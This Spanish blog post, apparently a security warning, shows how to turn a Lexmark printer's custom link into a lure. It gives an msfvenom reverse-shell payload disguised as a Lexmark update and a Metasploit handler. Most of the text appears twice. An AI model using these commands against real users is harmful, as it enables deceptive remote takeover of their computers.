Las impresoras, especialmente las de la marca Lexmark, tienen en su configuración la posibilidad de personalizar y editar enlaces. El usuario puede insertar libremente un enlace no estándar a través de un formulario.
Esta característica se puede encontrar a través de una página html, accediendo por la red local de la impresora. Por ejemplo, en: configuración, redes y gateways, configuración de enlace personalizado.
No hay duda acerca de la interactividad con el usuario, ya que el fabricante cuenta con una interfaz fácil e intuitiva.
Sin embargo, puede ser una puerta de entrada a un backdoor, o a algún código malicioso si alguien malintencionado puede acceder a los ajustes, ya sea por falta de cuidado con la seguridad o por otros medios de acceso.
Infectando al objetivo
La técnica es muy sencilla, se trata de hacer que el usuario acceda a los enlaces personalizados, que contienen el código malicioso establecido previamente.
En las pruebas se utilizó un script y un exploit para la conexión inversa.
Convencer al usuario para que acceda a los enlaces puede hacerse de diversas maneras, algunas de ellas:
Para descubrir la dirección de correo registrada en la impresora:
Configuraciones, Administrar accesos directos, Configuración de acceso directo, Correo electrónico:
Otra forma de descubrir la dirección de correo electrónico:
Configuraciones, Importar / Exportar, Exportar Archivos de acceso directo.
Descarga y abre el archivo:
2 - A parte del correo electrónico, se puede utilizar en paralelo, cambiar la pantalla de visualización de la impresora, por ejemplo:
Cambiar la configuración de pantalla
Ajuste, Ajustes generales, Información que se muestra:
Generando un exploit para el acceso remot
En la prueba, hemos creado un ejecutable con msfvenom:
El bypass no se utiliza efectivamente, era sólo para la demostración. Hay otras formas más eficientes.
Edición del enlace personalizado
En ajustes, redes y gateways, configuración vínculo personalizado.
Una vez configurado, enviar.
Hosting del ejecutable
En el ejemplo, la dirección de localhost se utiliza con un código html simple,
para la prueba. Sin embargo, para una mayor eficiencia, puedes utilizar una página personalizada falsa.
Estableciendo la conexión con el host después de ejecutar el archivo "Atualização_Lexmark.exe"
Usando Metasploit:
Consideraciones
Lo que se ha descrito en esta entrada no aborda lo que sería una vulnerabilidad (en este caso) propiamente dicha, sino una demostración de cómo utilizar una impresora como un vector de ataque.
Utilizamos la impresora Lexmark ya que contiene en su configuración la opción de enlaces personalizables. Concretamente el modelo Lexmark X646e.
Otros modelos también cuentan con la opción de enlaces personalizables, pero no han sido probados (comenta la entrada si pruebas con otros por favor).
La configuración de seguridad está disponible en el manual de la impresora o en el sitio del fabricante, se recomienda su lectura.
Esta entrada es sólo para fines de alerta y protección y las pruebas se realizaron en la red local.
Gracias por leernos.
Por c4io
twitter: c4ioli
Referencias:
- exploit-db.com/docs/38530.pdf
- support.lexmark.com/index?locale=PT&page=product&userlocale=PT_PT&productCode=LEXMARK_X646E#3
- metasploit.com
- offensive-security.com/metasploit-unleashed/msfvenom
Esta característica se puede encontrar a través de una página html, accediendo por la red local de la impresora. Por ejemplo, en: configuración, redes y gateways, configuración de enlace personalizado.
No hay duda acerca de la interactividad con el usuario, ya que el fabricante cuenta con una interfaz fácil e intuitiva.
Sin embargo, puede ser una puerta de entrada a un backdoor, o a algún código malicioso si alguien malintencionado puede acceder a los ajustes, ya sea por falta de cuidado con la seguridad o por otros medios de acceso.
Infectando al objetivo
La técnica es muy sencilla, se trata de hacer que el usuario acceda a los enlaces personalizados, que contienen el código malicioso establecido previamente.
En las pruebas se utilizó un script y un exploit para la conexión inversa.
Convencer al usuario para que acceda a los enlaces puede hacerse de diversas maneras, algunas de ellas:
Para descubrir la dirección de correo registrada en la impresora:
Configuraciones, Administrar accesos directos, Configuración de acceso directo, Correo electrónico:
Otra forma de descubrir la dirección de correo electrónico:
Configuraciones, Importar / Exportar, Exportar Archivos de acceso directo.
Descarga y abre el archivo:
2 - A parte del correo electrónico, se puede utilizar en paralelo, cambiar la pantalla de visualización de la impresora, por ejemplo:
Cambiar la configuración de pantalla
Ajuste, Ajustes generales, Información que se muestra:
Generando un exploit para el acceso remot
En la prueba, hemos creado un ejecutable con msfvenom:
# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00'
LHOST=10.18.166.129 LPORT=443 -f exe > Atualização_Lexmark.exe
El bypass no se utiliza efectivamente, era sólo para la demostración. Hay otras formas más eficientes.
Edición del enlace personalizado
En ajustes, redes y gateways, configuración vínculo personalizado.
Una vez configurado, enviar.
Hosting del ejecutable
En el ejemplo, la dirección de localhost se utiliza con un código html simple,
para la prueba. Sin embargo, para una mayor eficiencia, puedes utilizar una página personalizada falsa.
Estableciendo la conexión con el host después de ejecutar el archivo "Atualização_Lexmark.exe"
Usando Metasploit:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.18.166.129
lhost => 10.18.166.129
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > exploit
Consideraciones
Lo que se ha descrito en esta entrada no aborda lo que sería una vulnerabilidad (en este caso) propiamente dicha, sino una demostración de cómo utilizar una impresora como un vector de ataque.
Utilizamos la impresora Lexmark ya que contiene en su configuración la opción de enlaces personalizables. Concretamente el modelo Lexmark X646e.
Otros modelos también cuentan con la opción de enlaces personalizables, pero no han sido probados (comenta la entrada si pruebas con otros por favor).
La configuración de seguridad está disponible en el manual de la impresora o en el sitio del fabricante, se recomienda su lectura.
Esta entrada es sólo para fines de alerta y protección y las pruebas se realizaron en la red local.
Gracias por leernos.
Por c4io
twitter: c4ioli
Referencias:
- exploit-db.com/docs/38530.pdf
- support.lexmark.com/index?locale=PT&page=product&userlocale=PT_PT&productCode=LEXMARK_X646E#3
- metasploit.com
- offensive-security.com/metasploit-unleashed/msfvenom
muy interesante provando aver si se puede en una epson
ResponderEliminar